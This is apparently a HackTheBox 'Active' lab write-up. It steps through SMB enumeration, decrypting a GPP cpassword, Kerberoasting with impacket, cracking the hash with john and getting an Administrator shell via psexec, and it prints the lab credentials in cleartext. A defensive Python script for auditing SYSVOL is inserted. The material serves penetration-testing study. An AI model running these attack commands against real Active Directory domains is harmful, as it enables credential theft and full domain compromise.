wuerror / hackthebox_oscp
active.md 4.52 KB
wuerror committed on 2022-06-17 21:00 . Change file paths

Information gathering

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-30 07:58:03Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3889/tcp  filtered dandv-tester
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m46s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-30T07:59:01
|_  start_date: 2021-12-30T07:55:42

Check for SMB vulnerabilities

nmap -p 139,445 --script=smb-vuln* -Pn 10.10.10.100

Nothing exploitable.

List the SMB shares

smbclient --no-pass -L //10.10.10.100

[screenshot: active1]

Next, test which shares can be accessed; the Replication share allows login without credentials.

smbclient //10.10.10.100/Replication -U ""%""

I wanted to list all files with smbmap -H 10.10.10.100 -R, but probably because the network was too slow, smbmap could not connect.

So I had to browse through it manually.

[screenshot: active3]

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

This yields a set of credentials.

According to the walkthrough: Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN!

Decrypt it with gpp-decrypt (pypykatz works as well)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18
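From the defender's side, the same weakness is found by auditing SYSVOL for preference files that still carry a cpassword attribute (the files Microsoft's fix stopped creating are not removed retroactively). The following is an added example, not code from this writeup; it assumes you feed it (path, xml text) pairs, for instance from an os.walk over a copy of \\domain\SYSVOL\domain\Policies, and the sample XML is constructed with a placeholder cpassword.

```python
import os
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute (well-known names).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes in which the different preference types record the target account.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def find_cpasswords(xml_text):
    """Return one finding per preference item whose Properties carry cpassword."""
    findings = []
    for item in ET.fromstring(xml_text).iter():
        props = item.find("Properties")  # direct child only, so the root is skipped
        if props is None or "cpassword" not in props.attrib:
            continue
        account = next((props.attrib[a] for a in ACCOUNT_ATTRS
                        if props.attrib.get(a)), item.attrib.get("name"))
        findings.append({
            "type": item.tag,  # User, Drive, NTService, Task, ...
            "account": account,
            "changed": item.attrib.get("changed"),
            # an empty cpassword means no password was actually stored
            "stored": props.attrib["cpassword"] != "",
        })
    return findings

def audit_files(files):
    """files: iterable of (path, xml_text), e.g. fed by os.walk over a SYSVOL copy.
    Returns (path, finding) pairs; unparsable GPP files are reported, not skipped."""
    results = []
    for path, text in files:
        if os.path.basename(path) not in GPP_FILES:
            continue
        try:
            results.extend((path, f) for f in find_cpasswords(text))
        except ET.ParseError as exc:
            results.append((path, {"type": "parse_error", "error": str(exc)}))
    return results

# Constructed sample modelled on the writeup's Groups.xml (placeholder cpassword).
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">'
    '<Properties action="U" cpassword="PLACEHOLDER_CPASSWORD" '
    'userName="active.htb\\SVC_TGS"/></User></Groups>'
)
CLEAN_GROUPS_XML = ('<Groups><User name="svc"><Properties action="U" '
                    'userName="svc"/></User></Groups>')  # constructed, no password
```

Any hit with "stored" set to True should be treated as a leaked credential: rotate the account's password and delete the preference item, since read access to SYSVOL is granted to every domain user.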

Try these credentials against the other shares

# If the network is too slow, smbmap cannot connect, but smbclient still works
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
smbclient //10.10.10.100/Users -U "SVC_TGS"%"GPPstillStandingStrong2k18"

user.txt is found on the SVC_TGS user's Desktop.

[screenshot: active4]

P.S. No shell can be obtained at this point, because none of the SMB shares are writable for this user.

[screenshot: active8]

rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

ldap:

nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.100

A long output; it reveals that the domain name is active.htb, which I add to the hosts file.

Next, check for a DNS zone transfer vulnerability (there is none), then enumerate Kerberos users:

dnsrecon -d active.htb -t axfr
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='active.htb'" 10.10.10.100

This finds an Administrator account.

Kerberoasting & psexec

Query for services running under user accounts (SPNs bound to user accounts)

sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS 

[screenshot: active5]

Save the hash to a file and crack it with john

john --wordlist=/usr/share/wordlists/rockyou.txt tgt.out 

[screenshot: active6]

This gives the Administrator password: Ticketmaster1968

With these credentials, a shell can be obtained via psexec.

[screenshot: active7]
